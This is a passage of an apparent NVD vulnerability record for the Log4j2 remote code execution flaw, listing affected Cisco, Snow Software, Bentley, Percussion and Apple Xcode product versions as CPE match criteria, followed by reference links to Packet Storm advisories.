\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"4DFCE723-9359-40C7-BA35-B71BDF8E3CF3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.6\\\\(1\\\\):es01:*:*:*:*:*:*\",\"matchCriteriaId\":\"28B1524E-FDCA-4570-86DD-CE396271B232\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.6\\\\(1\\\\):es02:*:*:*:*:*:*\",\"matchCriteriaId\":\"74DC6F28-BFEF-4D89-93D5-10072DAC39C8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.6\\\\(1\\\\):es03:*:*:*:*:*:*\",\"matchCriteriaId\":\"BA1D60D7-1B4A-4EEE-A26C-389D9271E005\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.2.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1D726F07-06F1-4B0A-B010-E607E0C2A280\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.3.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3ED58B0E-FCC7-48E3-A5C0-6CC54A38BAE3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B2DF0B07-8C2A-4341-8AFF-DE7E5E5B3A43\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"41E168ED-D664-4749-805E-77644407EAFE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.6.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DCD69468-8067-4A5D-B2B0-EC510D889AA0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.7.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"85F22403-B4EE-4303-9C94-915D3E0AC944\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:7.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BBCA75A6-0A3E-4393-8884-9F3CE190641E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D619BF54-1BA9-45D0-A876-92D7010088A0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:002.004\\\\(000.914\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"808F8065-BD3A-4802-83F9-CE132EDB8D34\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:002.006\\\\(000.156\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"B236B13E-93B9-424E-926C-95D3DBC6CA5D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:002.007\\\\(000.356\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"8A63CC83-0A6E-4F33-A1BE-214A33B51518\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:003.000\\\\(000.458\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"37DB7759-6529-46DE-B384-10F060D86A97\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:003.001\\\\(000.518\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"8C640AD9-146E-488A-B166-A6BB940F97D3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:003.002\\\\(000.116\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"DAC1FA7E-CB1B-46E5-A248-ABACECFBD6E8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:integrated_management_controller_supervisor:002.003\\\\(002.000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7C3BD5AF-9FC1-494B-A676-CC3D4B8EAC8D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:integrated_management_controller_supervisor:2.3.2.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F477CACA-2AA0-417C-830D-F2D3AE93153A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:intersight_virtual_appliance:1.0.9-343:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7E3BE5E1-A6B6-46C7-B93B-8A9F5AEA2731\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:mobility_services_engine:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"04E0BB7B-0716-4DBD-89B9-BA11AAD77C00\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_assurance_engine:6.0\\\\(2.1912\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"64C98A76-0C31-45E7-882B-35AE0D2C5430\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"379F8D86-BE87-4250-9E85-494D331A0398\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.1\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"71F69E51-E59D-4AE3-B242-D6D2CFDB3F46\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.2\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"578DA613-8E15-4748-A4B7-646415449609\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.3\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"544EFAD6-CE2F-4E1D-9A00-043454B72889\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.4\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E16DF9C-3B64-4220-82B6-6E20C7807BAA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B9CD5B8A-9846-48F1-9495-77081E44CBFC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"68E6CD49-6F71-4E17-B046-FBE91CE91CB7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\\\(3\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0BDD8018-7E77-4C89-917E-ACDC678A7DE2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_insights_for_data_center:6.0\\\\(2.1914\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A7D39156-A47D-405E-8C02-CAE7D637F99A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_services_orchestrator:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5426FC59-411D-4963-AFEF-5B55F68B8958\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:optical_network_controller:1.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"810E9A92-4302-4396-94D3-3003947DB2A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:8.3\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"522C36A5-7520-4368-BD92-9AB577756493\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:8.4\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CB2EC4BE-FFAF-4605-8A96-2FEF35975540\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:8.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CA1D3C2A-E5FA-400C-AC01-27A3E5160477\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:9.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"63B27050-997B-4D54-8E5A-CE9E33904318\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:9.0\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5ABF05B8-1B8A-4CCF-A1AD-D8602A247718\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:9.1\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2F74580D-0011-4ED9-9A00-B4CDB6685154\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:12.5\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"17A3C22E-1980-49B6-8985-9FA76A77A836\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:14.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B1AB42DC-CE58-448A-A6B5-56F31B15F4A0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_service_catalog:12.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9DC32B55-0C76-4669-8EAD-DCC16355E887\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6CDA737F-337E-4C30-B68D-EF908A8D6840\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9DC5A89C-CCCF-49EC-B4FC-AB98ACB79233\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4BA4F513-CBA1-4523-978B-D498CEDAE0CF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6C53C6FD-B98E-4F7E-BA4D-391C90CF9E83\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.6.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D00F6719-2C73-4D8D-8505-B9922E8A4627\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EFE9210F-39C5-4828-9608-6905C1D378D4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A1CEDCE4-CFD1-434B-B157-D63329CBA24A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.1.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"33660EB8-2984-4258-B8AD-141B7065C85E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.1.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0ACA346D-5103-47F0-8BD9-7A8AD9B92E98\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.1.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A38BDF03-23C8-4BB6-A44D-68818962E7CB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.1.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3104C099-FEDA-466B-93CC-D55F058F7CD3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.2.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"890EA1C7-5990-4C71-857F-197E6F5B4089\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:21.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"56F21CF4-83FE-4529-9871-0FDD70D3095E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B9331834-9EAD-46A1-9BD4-F4027E49D0C3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1a\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0E707E44-12CD-46C3-9124-639D0265432E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1b\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2FEE8482-DB64-4421-B646-9E5F560D1712\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1c\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4385CE6E-6283-4621-BBD9-8E66E2A34843\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1d\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9A6CDBD4-889B-442D-B272-C8E9A1B6AEC0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1e\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FF1E59F9-CF4F-4EFB-872C-5F503A04CCF4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1f\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1782219F-0C3D-45B7-80C7-D1DAA70D90B1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1g\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DDAB3BAD-1EC6-4101-A58D-42DA48D04D0C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1h\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8F7AA674-6BC2-490F-8D8A-F575B11F4BE0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1k\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6945C4DE-C070-453E-B641-2F5B9CFA3B6D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1l\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DAB8C7C0-D09B-4232-A88E-57D25AF45457\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.17900.52\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"ACEDB7B4-EBD4-4A37-9EE3-07EE3B46BE44\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.18119.2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"820D579C-AA45-4DC1-945A-748FFCD51CA2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.18900.97\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7B23A9A6-CD04-4D76-BE3F-AFAFBB525F5E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.21900.40\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A44E6007-7A3A-4AD3-9A65-246C59B73FB6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.22900.28\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3D508E51-4075-4E34-BB7C-65AF9D56B49F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager_im_\\\\\u0026_presence_service:11.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"376D06D5-D68E-4FF0-97E5-CBA2165A05CF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager_im_\\\\\u0026_presence_service:11.5\\\\(1.22900.6\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"18ED6B8F-2064-4BBA-A78D-4408F13C724D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_computing_system:006.008\\\\(001.000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"94091FE3-AB88-4CF5-8C4C-77B349E716A9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"91D62A73-21B5-4D16-A07A-69AED2D40CC0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:12.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"53F1314A-9A2C-43DC-8203-E4654EF013CC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:12.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0ADE468B-8F0C-490D-BB4C-358D947BA8E4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"32FEE78D-309E-491D-9AB6-98005F1CBF49\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"878D9901-675D-4444-B094-0BA505E7433F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_express:12.5\\\\(1\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"66E25EE4-AB7B-42BF-A703-0C2E83E83577\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_express:12.5\\\\(1\\\\):su1:*:*:*:*:*:*\",\"matchCriteriaId\":\"D8F35520-F04A-4863-A1BC-0EDD2D1804F7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_express:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EF9855FD-7747-4D9E-9542-703B1EC9A382\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_express:12.6\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E07AF386-D8A5-44F5-A418-940C9F88A36A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_management_portal:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"113C77DA-AC22-4D67-9812-8510EFC0A95F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:11.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4BE221AB-A3B0-4CFF-9BC0-777773C2EF63\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:12.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"15941265-1E7E-4C3E-AF1D-027C5E0D3141\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:12.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"54AA2B0C-92A1-4B53-88D7-6E31120F5041\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_customer_voice_portal:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F9BD7207-85FB-4484-8720-4D11F296AC10\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_intelligence_center:12.6\\\\(1\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"62E009C4-BE3E-4A14-91EF-8F667B2220A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_intelligence_center:12.6\\\\(1\\\\):es01:*:*:*:*:*:*\",\"matchCriteriaId\":\"088512E1-434D-4685-992E-192A98ECAD9A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_intelligence_center:12.6\\\\(1\\\\):es02:*:*:*:*:*:*\",\"matchCriteriaId\":\"50A7BBC6-077C-4182-AA7A-577C4AAC3CD8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_intelligence_center:12.6\\\\(2\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"E0536F45-3A49-4F93-942E-AF679DFC7017\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_sip_proxy:010.000\\\\(000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3D54794B-6CD5-46D7-B9E9-62A642143562\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_sip_proxy:010.000\\\\(001\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BE844DCA-FF52-43F5-BDD9-836A812A8CFF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_sip_proxy:010.002\\\\(000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"07B261EB-CA63-4796-BD15-A6770FD68B34\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_sip_proxy:010.002\\\\(001\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"29F9067A-B86C-4A6B-ACB7-DB125E04B795\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_workforce_optimization:11.5\\\\(1\\\\):sr7:*:*:*:*:*:*\",\"matchCriteriaId\":\"FAC4CC92-8BA0-4D96-9C48-5E311CDED53F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unity_connection:11.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8F2437A5-217A-4CD1-9B72-A31BDDC81F42\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unity_connection:11.5\\\\(1.10000.6\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9C3CFF0D-BD70-4353-AE2F-6C55F8DE56A2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:video_surveillance_manager:7.14\\\\(1.26\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2CE47760-0E71-4FCA-97D1-CF0BB71CAC17\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:video_surveillance_manager:7.14\\\\(2.26\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"89B2D4F5-CB86-4B25-8C14-CED59E8A3F22\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:video_surveillance_manager:7.14\\\\(3.025\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B150B636-6267-4504-940F-DC37ABEFB082\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:video_surveillance_manager:7.14\\\\(4.018\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D00B9911-A7CA-467E-B7A3-3AF31828D5D9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:virtual_topology_system:2.6.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B67C08C3-412F-4B7F-B98C-EEAEE77CBE4B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.1.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6D428C9B-53E1-4D26-BB4D-57FDE02FA613\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.2.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CDB41596-FACF-440A-BB6C-8CAD792EC186\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.2.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D8C88EE2-5702-4E8B-A144-CB485435FD62\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.2.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1BC62844-C608-4DB1-A1AD-C1B55128C560\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EFF2FFA4-358A-4F33-BC67-A9EF8A30714E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"53C0BBDE-795E-4754-BB96-4D6D4B5A804F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7A41E377-16F9-423F-8DC2-F6EDD54E1069\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:wan_automation_engine:7.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F0C2789E-255B-45D9-9469-B5B549A01F53\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:3.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EFAFEC61-2128-4BFA-992D-54742BD4911A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:webex_meetings_server:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F12AF70E-2201-4F5D-A929-A1A057B74252\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:snowsoftware:snow_commander:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"8.10.0\",\"matchCriteriaId\":\"A2CBCDC4-02DF-47F4-A01C-7CBCB2FF0163\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:snowsoftware:vm_access_proxy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.6\",\"matchCriteriaId\":\"C42D44C8-9894-4183-969B-B38FDA1FEDF9\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:bentley:synchro:*:*:*:*:pro:*:*:*\",\"versionStartIncluding\":\"6.1\",\"versionEndExcluding\":\"6.4.3.2\",\"matchCriteriaId\":\"8CD3B3D3-CC14-4278-9914-F7C6E86D3119\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:bentley:synchro_4d:*:*:*:*:pro:*:*:*\",\"versionEndExcluding\":\"6.2.4.2\",\"matchCriteriaId\":\"0C5D6BF7-A818-4C7D-A305-91EB622271AC\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:percussion:rhythmyx:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"7.3.2\",\"matchCriteriaId\":\"16E0A04D-30BE-4AB3-85A1-13AF614C425C\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"13.3\",\"matchCriteriaId\":\"E0755E91-2F36-4EC3-8727-E8BF0427E663\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html\",\"source\":\"security@apache.org\",\"tags\":[\"Third Party Advisory\",\"VDB 